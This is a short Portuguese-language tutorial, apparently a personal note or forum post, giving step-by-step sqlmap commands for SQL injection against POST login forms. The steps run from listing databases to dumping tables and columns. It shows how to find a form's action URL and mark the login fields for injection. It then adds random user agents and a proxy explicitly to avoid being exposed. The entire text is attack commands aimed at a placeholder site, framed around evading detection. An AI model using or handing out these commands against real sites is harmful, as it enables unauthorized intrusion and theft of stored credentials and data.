Emerson
COMANDOS - SQLMAP Injetando via POST.
sqlmap.py --url *************** --current-db sqlmap.py --url *************** -D 'databasedosite' --tables sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite' --columns sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite" -C 'colunasdosite' --dump
----------------ANALISANDO DADOS PARA O ATAQUE VIA POST--------------------------
Vamos ao agora enviar via post.
Exemplo uma tela de login e senha!, como injetar com sqlmap ?? alvo:http://www.pagina.com.br/login.phpUrl para onde é enviado os posts usuario e senha, como saber qual url.Abra o codigo fonte e veja analise o fonte
Parte superior do formulário
Parte inferior do formulário gin" method="post" action="validar/ls.php" >
No caso para onde é enviado os posts "campos login e senha".URL alvo:http://www.pagina.com.br/validar/ls.php sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs
#2* e #1* Indica que são campos posts e os mesmo devem ser injetados
------------------------------DEIXANDO SEU AGENT HTTP RANDÔMICO---------------------
Vamos incrementar o comandos no teste.--ramdon-agent ou seja ele vai ramdomizar seu Agenthttp://en.wikipedia.org/wiki/User_agentEX:
Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
A cada requisição ele vai mudar seu Agentex:sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent
-----------------------------------SETANDO PROXY--------------------------------------------------------------
Para ficar não ficar exposto utilizer o parâmetro proxy sempre.--proxy="SEU PROXY:PORTA"ex:sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent --proxy="SEU PROXY:PORTA"